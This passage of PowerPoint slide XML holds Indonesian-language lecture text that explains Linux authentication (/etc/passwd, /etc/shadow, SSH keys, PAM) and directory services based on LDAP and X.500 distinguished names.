              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Pada Linux, nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di /etc/passwd. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>interaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperiksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di /etc/shadow. Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>interaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Secure Shell (SSH). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Modul </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicolokkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PAM) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> log-in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PAM juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>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81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42908030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Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Direktori</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Skema </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis-jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikandungnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>opsional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dioperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebanyakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada Lightweight Directory Access Protocol (LDAP), yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> X.500.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mirip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> X.500, nama yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (distinguished name, DN) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kumpulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Nama yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
